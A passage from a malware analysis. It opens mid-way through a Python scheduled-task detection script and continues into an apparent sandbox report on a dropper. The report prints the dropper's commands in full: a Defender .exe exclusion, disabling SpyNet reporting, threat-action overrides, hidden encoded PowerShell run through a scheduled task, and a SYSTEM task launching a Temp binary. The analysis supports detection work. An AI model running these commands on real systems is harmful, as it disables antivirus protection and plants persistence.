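            flags.append("transient: created, run and deleted by one parent (proxy execution, not persistence)")
        if create:
            action = create["action"] or ""
            if (create["run_as"] or "").upper() == "SYSTEM":
                flags.append("runs as SYSTEM")
            if TEMP_DIR.search(action):
                flags.append("action binary lives in a temp directory")
            if ENCODED_PS.search(action):
                flags.append("action runs base64-encoded PowerShell")
            if create["legacy_v1"]:
                flags.append("created with /V1 (pre-Vista-compatible task format)")
        findings[key] = {
            "name": items[0][1]["name"],
            "pids": [ev["pid"] for ev, _ in items],
            "run_as": create["run_as"] if create else None,
            "start": create["start"] if create else None,
            "action": create["action"] if create else None,
            "flags": flags,
        }
    return findings


if __name__ == "__main__":
    for f in classify_tasks(EVENTS).values():
        print(f["name"], f["pids"], f["run_as"], f["start"], f["flags"])
```

The parent check matters: a create/run/delete triple from one process is the proxy-execution signature, while a task that is created and left in place, runs as SYSTEM and points into a user-writable Temp path is the one to hunt for on other hosts.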


AV Detection

Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe | Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | ReversingLabs: Detection: 65%
Source: C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe | ReversingLabs: Detection: 65%
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040553A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\__data__\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
Source: powershell.exe, 00000011.00000002.421328479.000002036A385000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.363453678.0000020350765000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.364982026.0000020352381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.431937446.0000000003E01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.491588777.00000000006B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: reg.exe | Process created: 49

System Summary

Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exeProcess created: Commandline size = 3260Jump to behavior
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile deleted: C:\Windows\SysWOW64\GroupPolicyMgeaNJump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeFile created: C:\Windows\system32\GroupPolicy\gpt.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004162A60_2_004162A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E5A50_2_0040E5A5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004126B00_2_004126B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A010_2_00403A01
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EF10_2_00418EF1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418FCB0_2_00418FCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_03C1E2A024_2_03C1E2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_03C1C7A024_2_03C1C7A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1876024_2_06F18760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1001D24_2_06F1001D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1876024_2_06F18760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_06F1004024_2_06F10040
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00413954 appears 179 times
Source: file.exe, 00000000.00000000.297408381.0000000000427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exeBinary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe F78888154E211E2398FDD45D36D381E411B413EF5314D8D44D59A55C40EF23BD
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe | Process created: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "goSRLihgj"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "goSRLihgj"
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exe | Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe | Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
